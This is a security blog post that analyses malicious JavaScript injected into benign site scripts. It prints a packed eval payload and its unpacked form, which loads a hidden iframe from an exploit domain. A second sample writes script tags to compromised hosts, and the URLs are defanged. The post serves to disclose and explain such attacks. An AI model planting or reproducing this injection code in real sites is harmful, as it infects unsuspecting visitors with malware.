• When Benign scripts attack – II

    A few weeks back I wrote about how hackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post about this issue, we saw how common scripts like JQuery and AC_RunActiveContent, mootools and others were being targeted. This time we will look at injection in a script which does not conform to the trend mentioned.

    This particular example is not a popularly deployed script, and is probably hand-coded by a developer for their purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code listed on one of the associated JavaScript files which are pulled in from the local drives. Interestingly, the code is packed using the popular, Dean-Edwards-Packer, like format. Unpacking it is trivial and hence the actual code which was not part of the original file is also displayed below.

    // defines for sections
    var SECTION_LOGIN    = 0;
    var SECTION_MAIL     = 1;
    
    // defines for screens
    var SCREEN_LOGIN              = 0;
    var SCREEN_MESSAGES_LIST_VIEW = 1;
    var SCREEN_MESSAGES_LIST      = 2;
    var SCREEN_VIEW_MESSAGE       = 3;
    var SCREEN_NEW_MESSAGE        = 4;
    
    var Sections = Array();
    Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
    Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
    Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
    Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';
    
    **code removed for brevity**
    
    var REDRAW_NOTHING = 0;
    var REDRAW_PAGE    = 3;
    var AUTOSELECT_CHARSET = -1;
    var VIEW_MODE_WITH_PANE     = 1;
    var Fonts = [Arial, Arial Black, Courier New, Tahoma, Times New Roman, Verdana]
    
    Ready(INIT_DEFINES);
    
    **malicious code**
    
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k){p=p.replace(new RegExp(be(c)b,g),k)}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(<3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t></2s>);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));
    
    **unpacked form**
    
    ['var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}\n']</pre>
    

    Our systems flagged this as unsafe and for further validation one can look up malware-domain-list .

    2009/03/28_00:00 loading-atm.net/b2b/ 83.133.123.140 t490.1paket.com redirects to exploits Jsfgvbg (loading-atm@mail.ru) 13237

    The exploit seems to throw a executable to the victim’s system, which in turn is a down-loader and tries to grab two more files from the same domain.

    And to whet your appetite more, here’s another example captured from hxxp://www. aikidoofqueens. com/kids/

    <pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
    var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
    var pname="";var al="";var gd=0;var gx,gy;var d=document;
    var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
    var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
    ||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
    !NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
    navigator.userAgent.indexOf('Netscape6')!=-1);
    var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
    if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 
    
    ** code removed for brevity **
    
    <pre id="16a4ab078355b4e53857777860831edc756eb492-1-highlight">clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
    +(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
    else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
    el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}
    
    ** malicious code **
    
    document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
    document.write('<sc ript src=hxxp://gh anafoneshop.com/category_images/vieworder.php ><\/s cript>');
    document.write('<scr ipt src=hxxp://gha nafoneshop.com/category_images/vieworder.php ><\/sc ript>');
    document.write('<scri pt src=hxxp://ghan afoneshop.com/category_images/vieworder.php ><\/scr ipt>');
    document.write('<scrip t src=hxxp://ghana foneshop.com/category_images/vieworder.php ><\/scri pt>');
    document.write('<sc ript src=hxxp://ghanaf oneshop.com/category_images/vieworder.php ><\/scrip t>');
    document.write('<scr ipt src=hxxp://ramazan -toker.com/images/gifimg.php ><\/sc ript>');